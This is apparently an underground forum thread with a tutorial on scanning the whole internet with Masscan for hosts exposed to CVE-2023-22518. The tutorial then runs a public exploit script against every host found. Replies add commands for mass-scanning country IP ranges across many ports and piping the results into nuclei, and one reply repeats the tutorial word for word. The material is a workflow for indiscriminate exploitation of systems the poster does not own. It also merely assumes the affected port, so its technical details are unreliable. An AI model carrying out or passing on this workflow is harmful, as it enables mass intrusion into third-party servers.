Using Masscan to Scan the Entire Internet for CVE-2023-22518

[dataleak]

In this tutorial, we will guide you through the process of using Masscan, a high-speed port scanner, to scan the entire internet for systems vulnerable to CVE-2023-22518. This CVE pertains to a specific vulnerability which you should verify and understand fully before proceeding.

Prerequisites​

1. A machine with Masscan installed: Ensure you have a dedicated server or virtual machine with sufficient resources.
2. Root privileges: You need to run Masscan as root or with sudo privileges.
3. Understanding of the CVE-2023-22518: Familiarize yourself with the specific ports and protocols associated with this CVE.

Step 1: Install Masscan​

First, install Masscan on your machine. On a Debian-based system, you can do this with:

bash

sudo apt-get update
sudo apt-get install masscan

For other systems, you may need to build from source:

bash

git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
sudo make install

Step 2: Understand the CVE-2023-22518​

Before running a scan, understand which ports and services are affected by this CVE. Let's assume CVE-2023-22518 affects a service running on port 8080.

Step 3: Configure Masscan​

Create a configuration file masscan.conf to set the parameters for the scan. Here is an example configuration:

ini

rate = 100000
output-format = binary
output-filename = scan_results.bin
ports = 8080

In this example:

• rate sets the speed of the scan (100,000 packets per second).
• output-format sets the output format (binary for faster performance).
• output-filename specifies the name of the output file.
• ports specifies the port to scan (8080 in this case).

Step 4: Run Masscan​

To run Masscan using the configuration file, use the following command:

bash

sudo masscan -c masscan.conf

Alternatively, you can run Masscan with command-line arguments:

bash

sudo masscan 0.0.0.0/0 -p8080 --rate 100000 -oB scan_results.bin

Step 5: Convert Results to Readable Format​

Masscan outputs results in binary format for efficiency. Convert the results to a readable format using:

bash

sudo masscan -oL scan_results.txt -r scan_results.bin

This command will generate a scan_results.txt file with the IP addresses of hosts running the vulnerable service on port 8080.

Step 6: Analyze Results​

Open the scan_results.txt file to review the scanned IP addresses. Each line will show an IP address with the open port 8080.

Step 7: Verify Vulnerability​

Having identified potentially vulnerable systems, you should verify the actual vulnerability using more specific tools or scripts related to CVE-2023-22518. This might involve:

• https://github.com/RevoltSecurities/CVE-2023-22518/tree/main

Make sure to format the masscan output to the correct format for the POC code.

bash

git clone https://github.com/sanjai-AK47/CVE-2023-22518
cd CVE-2023-22518
python3 exploit.py -dL hosts.txt -o output.txt -t 30

 

[Fuhrer]

Nicely done!

 

[vagabond]

U may use this to automate convert into the format.

masscan -iL IP.txt -p8080 --rate=10000 --exclude 255.255.255.255 |awk '{print $6}' > port8080.txt

IP.txt contains:

0.0.0.0-254.254.254.254

 

[V0dka]

Или

IP2Location LITE

IP Address Geolocation to Country, City, Region, Latitude, Longitude, ZIP Code, ISP, Domain, Time Zone, Area Code, Mobile Data, Usage Type, Elevation and so on.

lite.ip2location.com

ещё пишут, что:

Интересует база ip2location-db1 (ip-country): https://www.ip2location.com/database/db1-ip-country
Может ли кто-нибудь поделиться? В бесплатной не полные диапазоны. © reqwest

 

[Guest]

Masscan:

masscan -iL USA.txt -oL done.txt --rate 100000 --ttl 64 -p 444,443,4433,1443,2443,3443,4443,5443,6443,7443,8443,9443,10443,11443,12443 -sS -Pn -n --exclude 255.255.255.255

Parse:

awk '{ print $4 ":" $3 }' done.txt > parsed.txt

Nuclei:

nuclei -t templates.txt -l parsed.txt -rl 500 -o ready.txt -stats

templates.txt would contain the path to your nuclei templates.

 

[Sec13B]

In this tutorial, we will guide you through the process of using Masscan, a high-speed port scanner, to scan the entire internet for systems vulnerable to CVE-2023-22518. This CVE pertains to a specific vulnerability which you should verify and understand fully before proceeding.

Prerequisites​

1. A machine with Masscan installed: Ensure you have a dedicated server or virtual machine with sufficient resources.
2. Root privileges: You need to run Masscan as root or with sudo privileges.
3. Understanding of the CVE-2023-22518: Familiarize yourself with the specific ports and protocols associated with this CVE.

Step 1: Install Masscan​

First, install Masscan on your machine. On a Debian-based system, you can do this with:

bash

sudo apt-get update
sudo apt-get install masscan

For other systems, you may need to build from source:

bash

git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
sudo make install

Step 2: Understand the CVE-2023-22518​

Before running a scan, understand which ports and services are affected by this CVE. Let's assume CVE-2023-22518 affects a service running on port 8080.

Step 3: Configure Masscan​

Create a configuration file masscan.conf to set the parameters for the scan. Here is an example configuration:

ini

rate = 100000
output-format = binary
output-filename = scan_results.bin
ports = 8080

In this example:

• rate sets the speed of the scan (100,000 packets per second).
• output-format sets the output format (binary for faster performance).
• output-filename specifies the name of the output file.
• ports specifies the port to scan (8080 in this case).

Step 4: Run Masscan​

To run Masscan using the configuration file, use the following command:

bash

sudo masscan -c masscan.conf

Alternatively, you can run Masscan with command-line arguments:

bash

sudo masscan 0.0.0.0/0 -p8080 --rate 100000 -oB scan_results.bin

Step 5: Convert Results to Readable Format​

Masscan outputs results in binary format for efficiency. Convert the results to a readable format using:

bash

sudo masscan -oL scan_results.txt -r scan_results.bin

This command will generate a scan_results.txt file with the IP addresses of hosts running the vulnerable service on port 8080.

Step 6: Analyze Results​

Open the scan_results.txt file to review the scanned IP addresses. Each line will show an IP address with the open port 8080.

Step 7: Verify Vulnerability​

Having identified potentially vulnerable systems, you should verify the actual vulnerability using more specific tools or scripts related to CVE-2023-22518. This might involve:

• https://github.com/RevoltSecurities/CVE-2023-22518/tree/main

Make sure to format the masscan output to the correct format for the POC code.

bash

git clone https://github.com/sanjai-AK47/CVE-2023-22518
cd CVE-2023-22518
python3 exploit.py -dL hosts.txt -o output.txt -t 30

http or https ?

 

[Sec13B]

Masscan:

masscan -iL USA.txt -oL done.txt --rate 100000 --ttl 64 -p 444,443,4433,1443,2443,3443,4443,5443,6443,7443,8443,9443,10443,11443,12443 -sS -Pn -n --exclude 255.255.255.255

Parse:

awk '{ print $4 ":" $3 }' done.txt > parsed.txt

Nuclei:

nuclei -t templates.txt -l parsed.txt -rl 500 -o ready.txt -stats

templates.txt would contain the path to your nuclei templates.

after Parse

cat parsed.txt  | sed 's/.*/http\:\/\/&/' > parsed_http.txt

nuclei -t templates.txt -l parsed_http.txt -rl 500 -o ready.txt -stats

 

[xemi]

cool, ty!

 

[toto007]

cool